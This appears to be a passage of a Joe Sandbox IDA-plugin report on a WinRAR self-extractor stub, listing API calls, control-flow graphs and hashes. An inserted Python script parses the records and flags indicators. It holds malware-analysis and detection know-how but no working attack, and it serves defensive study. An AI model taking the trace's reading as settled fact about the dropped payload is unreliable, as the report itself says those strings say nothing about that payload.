  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0012D5AB
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D5BA
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D5E1
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001443F4), ref: 0012D5F0
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0012BA68
• GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0012BA90
• GetTickCount.KERNEL32 ref: 0012BAAE
• _swprintf.LIBCMT ref: 0012BAC2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0012BAF4
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0012BB43
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BB7C
                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0012BBD0
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0012BBEA
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0012BC47
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0012BC6F
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0012BCB9
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0012BCE2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0012BCEB
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BD1E
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012BD7D
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,001435F4), ref: 0012BD94
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0012BD9D
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0012BDAC
                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0012BDBB
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012BE68
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012BEBE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BEE8
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0012BF32
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0012BF4C
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0012BF55
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0012BF6B
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0012BF85
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,0015A472), ref: 0012BFA7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0012C007
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012C01A
                                                                                                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0012C0BD
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0012C197
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0012C1D9
                                                                                                                                                                                                      • Part of subcall function 0012C73F: __EH_prolog.LIBCMT ref: 0012C744
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012C1FD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$c:\programdata$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 3445078344-4126391903
                                                                                                                                                                                                    • Opcode ID: 1d15ff9914416fbf52ffeaf6689b34e56fb475bf1458ac3c081a573f8f179136
                                                                                                                                                                                                    • Instruction ID: 9b0c95bf96e5c7917576ac08b69d7023ea51f00c9611205caf660b3d91517a1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d15ff9914416fbf52ffeaf6689b34e56fb475bf1458ac3c081a573f8f179136
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED42D470948364FEEB219BB0AC8AFBE777CAB11700F040165F645B64E2CB745AD4CB61

Control-flow Graph
control_flow_graph 268 120863-120886 call 12ec50 GetModuleHandleW 271 1208e7-120b48 268->271 272 120888-12089f GetProcAddress 268->272 273 120c14-120c40 GetModuleFileNameW call 11c29a call 120602 271->273 274 120b4e-120b59 call 1375fb 271->274 275 1208a1-1208b7 272->275 276 1208b9-1208c9 GetProcAddress 272->276 291 120c42-120c4e call 11b146 273->291 274->273 286 120b5f-120b8d GetModuleFileNameW CreateFileW 274->286 275->276 277 1208e5 276->277 278 1208cb-1208e0 276->278 277->271 278->277 288 120c08-120c0f CloseHandle 286->288 289 120b8f-120b9b SetFilePointer 286->289 288->273 289->288 292 120b9d-120bb9 ReadFile 289->292 298 120c50-120c5b call 12081b 291->298 299 120c7d-120ca4 call 11c310 GetFileAttributesW 291->299 292->288 294 120bbb-120be0 292->294 296 120bfd-120c06 call 120371 294->296 296->288 305 120be2-120bfc call 12081b 296->305 298->299 307 120c5d-120c7b CompareStringW 298->307 308 120ca6-120caa 299->308 309 120cae 299->309 305->296 307->299 307->308 308->291 311 120cac 308->311 312 120cb0-120cb5 309->312 311->312 313 120cb7 312->313 314 120cec-120cee 312->314 317 120cb9-120ce0 call 11c310 GetFileAttributesW 313->317 315 120cf4-120d0b call 11c2e4 call 11b146 314->315 316 120dfb-120e05 314->316 327 120d73-120da6 call 114092 AllocConsole 315->327 328 120d0d-120d6e call 12081b * 2 call 11e617 call 114092 call 11e617 call 12a7e4 315->328 323 120ce2-120ce6 317->323 324 120cea 317->324 323->317 326 120ce8 323->326 324->314 326->314 333 120df3-120df5 ExitProcess 327->333 334 120da8-120ded GetCurrentProcessId AttachConsole call 133e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
APIs
• GetModuleHandleW.KERNEL32(kernel32), ref: 0012087C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0012088E
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001208BF
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00120B69
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00120B83
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00120B93
• ReadFile.KERNEL32(00000000,?,00007FFE,00143C7C,00000000), ref: 00120BB1
• CloseHandle.KERNEL32(00000000), ref: 00120C09
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00120C1E
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00143C7C,?,00000000,?,00000800), ref: 00120C72
• GetFileAttributesW.KERNELBASE(?,?,00143C7C,00000800,?,00000000,?,00000800), ref: 00120C9C
• GetFileAttributesW.KERNEL32(?,?,00143D44,00000800), ref: 00120CD8
  • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
  • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
• _swprintf.LIBCMT ref: 00120D4A
• _swprintf.LIBCMT ref: 00120D96
  • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
• AllocConsole.KERNEL32 ref: 00120D9E
• GetCurrentProcessId.KERNEL32 ref: 00120DA8
• AttachConsole.KERNEL32(00000000), ref: 00120DAF
• _wcslen.LIBCMT ref: 00120DC4
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00120DD5
• WriteConsoleW.KERNEL32(00000000), ref: 00120DDC
• Sleep.KERNEL32(00002710), ref: 00120DE7
• FreeConsole.KERNEL32 ref: 00120DED
• ExitProcess.KERNEL32 ref: 00120DF5
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 1207345701-3298887752
• Opcode ID: 4733f38eb058c14cf205a427fee6bd3cfcf3f9792f0747139b8c1d15131c4c95
• Instruction ID: cb9c800d5b81eff29eec42c01095fd6b1b24d8f676c75d54ce49277e3260fe2b
• Opcode Fuzzy Hash: 4733f38eb058c14cf205a427fee6bd3cfcf3f9792f0747139b8c1d15131c4c95
• Instruction Fuzzy Hash: 41D1A4B1408394ABD331DF90D989BDFBBE8BF85704F504A1DF1A9A7161C7B08658CB62
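The two records above come from the Joe Sandbox IDA plugin for the WinRAR self-extractor (SFX) stub whose dump is listed under Memory Dump Source. The first record shows the extraction path: a file mapping named winrarsfxmappingfile.tmp, the `-el -s2 "-d%s" "-sp%s"` switch string and the c:\programdata destination, then ShellExecuteExW. The second shows the stub's own start-up check for DXGIDebug.dll, dwmapi.dll and uxtheme.dll beside its executable, which ends in the "Please remove %s from %s folder" console message, a ten-second Sleep and ExitProcess. As an added example that is not part of the Joe Sandbox report or its plugin, the Python script below parses records in this format into structured calls and applies a small indicator table to them. The regular expression, the ApiCall record, the INDICATORS table and every function name are assumptions made for this illustration; the sample records are copied from the listings above so that the script runs offline.

```python
"""Structured triage of Joe Sandbox IDA-plugin API records.

Added example, not code from the Joe Sandbox report or its plugin. The record
regex, the ApiCall type, the INDICATORS table and the helper names are
assumptions made for this illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One record: optional "Part of subcall function XXXX:" prefix, then
# Api.Module(arg,arg,...) or a bare Api.Module for CRT calls, then ", ref: addr".
_RECORD_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# The plugin prints recovered immediates as 8 hex digits; "?" means not recovered.
_HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    name: str                        # API symbol, e.g. CreateFileMappingW
    module: str                      # module the plugin resolved it to, e.g. KERNEL32
    args: list                       # raw argument tokens in call order
    ref: int                         # call-site address inside the dump
    subcall_of: Optional[str] = None  # set when the plugin folded in a callee's record

    def hex_args(self):
        """Immediate arguments as integers (Sleep(00002710) -> 10000 ms)."""
        return [int(a, 16) for a in self.args if _HEX8_RE.fullmatch(a)]

    def string_args(self):
        """Arguments the plugin resolved to strings or symbols: the analyst-relevant ones."""
        return [a for a in self.args if a != "?" and not _HEX8_RE.fullmatch(a)]


def parse_trace(text: str) -> list:
    """Turn the bullet records into ApiCall objects; lines that are not records are skipped."""
    calls = []
    for line in text.splitlines():
        m = _RECORD_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def api_histogram(calls) -> Counter:
    """Count call sites per module!API, the quickest way to see what a function is for."""
    return Counter(f"{c.module}!{c.name}" for c in calls)


# Indicator table (an assumption for this example) built from strings visible in
# the records above: SFX stub artefacts, dialog resources, the payload launch and
# the stub's own DLL-planting check.
INDICATORS = {
    "winrar-sfx-stub": {"winrarsfxmappingfile.tmp", "__tmp_rar_sfx_access_check_%u"},
    "sfx-dialog-resources": {"LICENSEDLG", "STARTDLG"},
    "launches-extracted-payload": {"ShellExecuteExW"},
    "dll-hijack-self-check": {"SetDllDirectoryW", "SetDefaultDllDirectories",
                              "DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll"},
}


def flag_indicators(calls) -> list:
    """Labels whose needles occur as an API name or as a resolved string argument."""
    tokens = {c.name for c in calls}
    for c in calls:
        tokens.update(c.string_args())
    return sorted(label for label, needles in INDICATORS.items() if needles & tokens)


# Records copied from the two function listings above (not a complete trace).
SAMPLE_TRACE = """\
• Part of subcall function 0012D4D4: GetDlgItem.USER32(00000068,0016FCB8), ref: 0012D4E8
• GetTickCount.KERNEL32 ref: 0012BAAE
• _swprintf.LIBCMT ref: 0012BAC2
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0012BBD0
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0012BC47
• ShellExecuteExW.SHELL32(0000003C), ref: 0012BC6F
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0012C0BD
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0012088E
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00143C7C,?,00000000,?,00000800), ref: 00120C72
• Sleep.KERNEL32(00002710), ref: 00120DE7
Strings
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.name} {c.string_args()}")
    print("indicators:", flag_indicators(calls))
```

Run as a script it lists each call site with its resolved string arguments and the indicator labels hit. On a full report the flag set explains the c:\programdata extraction path and the child process as SFX behaviour, while the DLL names and the "Please remove %s from %s folder" message belong to the stub's own start-up check (it prints the warning and exits), so they say nothing about the dropped payload.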

Control-flow Graph
control_flow_graph 347 12c73f-12c757 call 12eb78 call 12ec50 352 12d40d-12d418 347->352 353 12c75d-12c787 call 12b314 347->353 353->352 356 12c78d-12c792 353->356 357 12c793-12c7a1 356->357 358 12c7a2-12c7b7 call 12af98 357->358 361 12c7b9 358->361 362 12c7bb-12c7d0 call 121fbb 361->362 365 12c7d2-12c7d6 362->365 366 12c7dd-12c7e0 362->366 365->362 367 12c7d8 365->367 368 12c7e6 366->368 369 12d3d9-12d404 call 12b314 366->369 367->369 371 12c9be-12c9c0 368->371 372 12ca5f-12ca61 368->372 373 12ca7c-12ca7e 368->373 374 12c7ed-12c7f0 368->374 369->357 380 12d40a-12d40c 369->380 371->369 378 12c9c6-12c9d2 371->378 372->369 376 12ca67-12ca77 SetWindowTextW 372->376 373->369 377 12ca84-12ca8b 373->377 374->369 379 12c7f6-12c850 call 12a64d call 11bdf3 call 11a544 call 11a67e call 116edb 374->379 376->369 377->369 381 12ca91-12caaa 377->381 382 12c9e6-12c9eb 378->382 383 12c9d4-12c9e5 call 137686 378->383 436 12c98f-12c9a4 call 11a5d1 379->436 380->352 387 12cab2-12cac0 call 133e13 381->387 388 12caac 381->388 385 12c9f5-12ca00 call 12b48e 382->385 386 12c9ed-12c9f3 382->386 383->382 392 12ca05-12ca07 385->392 386->392 387->369 401 12cac6-12cacf 387->401 388->387 398 12ca12-12ca32 call 133e13 call 133e3e 392->398 399 12ca09-12ca10 call 133e13 392->399 424 12ca34-12ca3b 398->424 425 12ca4b-12ca4d 398->425 399->398 405 12cad1-12cad5 401->405 406 12caf8-12cafb 401->406 410 12cb01-12cb04 405->410 411 12cad7-12cadf 405->411 406->410 413 12cbe0-12cbee call 120602 406->413 418 12cb11-12cb2c 410->418 419 12cb06-12cb0b 410->419 411->369 416 12cae5-12caf3 call 120602 411->416 426 12cbf0-12cc04 call 13279b 413->426 416->426 437 12cb76-12cb7d 418->437 438 12cb2e-12cb68 418->438 419->413 419->418 431 12ca42-12ca4a call 137686 424->431 432 12ca3d-12ca3f 424->432 425->369 427 12ca53-12ca5a call 133e2e 425->427 446 12cc11-12cc62 call 120602 call 12b1be GetDlgItem SetWindowTextW SendMessageW call 133e49 426->446 447 12cc06-12cc0a 426->447 427->369 431->425 432->431 453 12c855-12c869 SetFileAttributesW 436->453 454 12c9aa-12c9b9 call 11a55a 436->454 440 12cbab-12cbce call 133e13 * 2 437->440 441 12cb7f-12cb97 call 133e13 437->441 464 12cb6a 438->464 465 12cb6c-12cb6e 438->465 440->426 475 12cbd0-12cbde call 1205da 440->475 441->440 458 12cb99-12cba6 call 1205da 441->458 483 12cc67-12cc6b 446->483 447->446 452 12cc0c-12cc0e 447->452 452->446 459 12c90f-12c91f GetFileAttributesW 453->459 460 12c86f-12c8a2 call 11b991 call 11b690 call 133e13 453->460 454->369 458->440 459->436 470 12c921-12c930 DeleteFileW 459->470 490 12c8a4-12c8b3 call 133e13 460->490 491 12c8b5-12c8c3 call 11bdb4 460->491 464->465 465->437 470->436 474 12c932-12c935 470->474 478 12c939-12c965 call 114092 GetFileAttributesW 474->478 475->426 487 12c937-12c938 478->487 488 12c967-12c97d MoveFileW 478->488 483->369 484 12cc71-12cc85 SendMessageW 483->484 484->369 487->478 488->436 492 12c97f-12c989 MoveFileExW 488->492 490->491 497 12c8c9-12c908 call 133e13 call 12fff0 490->497 491->454 491->497 492->436 497->459
APIs
• __EH_prolog.LIBCMT ref: 0012C744
  • Part of subcall function 0012B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0012B3FB
• _wcslen.LIBCMT ref: 0012CA0A
• _wcslen.LIBCMT ref: 0012CA13
• SetWindowTextW.USER32(?,?), ref: 0012CA71
• _wcslen.LIBCMT ref: 0012CAB3
• _wcsrchr.LIBVCRUNTIME ref: 0012CBFB
• GetDlgItem.USER32(?,00000066), ref: 0012CC36
• SetWindowTextW.USER32(00000000,?), ref: 0012CC46
• SendMessageW.USER32(00000000,00000143,00000000,0015A472), ref: 0012CC54
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0012CC7F
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 2804936435-312220925
• Opcode ID: 0c5755f0a700a530f564071027051a7f677485f549fadfc75f16f8b82ef6a214
• Instruction ID: 81b58d91b8350bb2bc1d525d5877ca507c567978fde385dd25022707fd436d16
• Opcode Fuzzy Hash: 0c5755f0a700a530f564071027051a7f677485f549fadfc75f16f8b82ef6a214
• Instruction Fuzzy Hash: 22E176B2900229ABDF25DBA4EC85EEE73BCAF14350F4441A5F619E3050EB749F948F60
APIs
• __EH_prolog.LIBCMT ref: 0011DA70
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0011DAAC
  • Part of subcall function 0011C29A: _wcslen.LIBCMT ref: 0011C2A2
  • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
  • Part of subcall function 00121B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0011BAE9,00000000,?,?,?,000801EA), ref: 00121BA0
• _wcslen.LIBCMT ref: 0011DDE9
• __fprintf_l.LIBCMT ref: 0011DF1C
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
• String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
• API String ID: 566448164-801612888
• Opcode ID: 0c37dd6170afda791724d576363d46bf10bf5797947fc4389751622d2ace40c7
• Instruction ID: 1cf3710e775ceb47c3fddb44011336e7d775cf57aebfd0f7cb3b8bf22bbb3dd6
• Opcode Fuzzy Hash: 0c37dd6170afda791724d576363d46bf10bf5797947fc4389751622d2ace40c7
• Instruction Fuzzy Hash: 2B32DF71A00218ABCF2DEFA8D842BEE77A5FF19304F40456AF90597291E7B1D9C5CB90

Control-flow Graph

APIs
  • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
  • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
  • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
  • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
  • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
• GetDlgItem.USER32(00000068,0016FCB8), ref: 0012D4E8
• ShowWindow.USER32(00000000,00000005,?,?,?,0012AF07,00000001,?,?,0012B7B9,0014506C,0016FCB8,0016FCB8,00001000,00000000,00000000), ref: 0012D510
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012D51B
• SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012D529
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D53F
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0012D559
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D59D
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0012D5AB
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D5BA
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D5E1
• SendMessageW.USER32(00000000,000000C2,00000000,001443F4), ref: 0012D5F0
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
• Opcode ID: 342b7304e8705ddaf76ebd97a85e44149c3b8521a885469dafd5670b2317a63d
• Instruction ID: a9c23be277350ed09922f363383fb041e90af09020b3124b577c831b372b1457
• Opcode Fuzzy Hash: 342b7304e8705ddaf76ebd97a85e44149c3b8521a885469dafd5670b2317a63d
• Instruction Fuzzy Hash: 8A31D371145342EFD301DF20EC4AFAB7FBCEB82705F000908F5A59A5A0DB649A849776

Control-flow Graph

• Executed
• Not Executed
APIs
• FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0012B73D,00000066), ref: 0012A6D5
• SizeofResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A6EC
• LoadResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A703
• LockResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A712
• GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0012B73D,00000066), ref: 0012A72D
• GlobalLock.KERNEL32(00000000), ref: 0012A73E
• CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0012A762
• GlobalUnlock.KERNEL32(00000000), ref: 0012A7C6
  • Part of subcall function 0012A626: GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0012A7A7
• GlobalFree.KERNEL32(00000000), ref: 0012A7CD
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: PNG
                                                                                                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                                                                                                    • Opcode ID: e48df84b459c0a21bc9df7e227ec09e58a7ebab297ade6ef17ec5cf9dcd17ba8
                                                                                                                                                                                                    • Instruction ID: fbb05e972f5c36fd37f35e94c2669c3f65ff78030e1672e7c95014e9b5aeef08
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e48df84b459c0a21bc9df7e227ec09e58a7ebab297ade6ef17ec5cf9dcd17ba8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF31C27A600712BFD7119F21EC88D1B7BB9FF85B61B000918F91592A70EB32DC90CBA1

Control-flow Graph

• Executed
• Not Executed
